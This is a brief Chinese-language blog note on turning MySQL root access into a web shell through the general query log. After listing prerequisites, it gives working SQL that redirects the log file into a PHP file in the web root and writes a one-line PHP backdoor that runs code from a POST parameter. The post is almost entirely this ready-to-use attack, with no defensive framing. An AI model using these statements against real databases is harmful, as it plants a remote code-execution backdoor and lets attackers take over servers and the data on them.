DYBOY's Blog

[笔记]Mysql通过日志拿shell

Mysql通过日志拿shell

emmm~有点舒服

0x00 利用条件

  1. root

  2. 网站物理路径

  3. 文件位置未被限制


0x01 SQL语句

set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/dyboy.php';
select '<?php @assert($_POST["dyboy"]); ?>';
set global general_log = off;
版权声明:《 [笔记]Mysql通过日志拿shell 》为DYBOY原创文章未经允许不得转载。

 DYBOY
 作者签名:专注程序开发和Web安全,商业合作请联系dyboy2017@qq.com

发表评论:

用心评论~

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap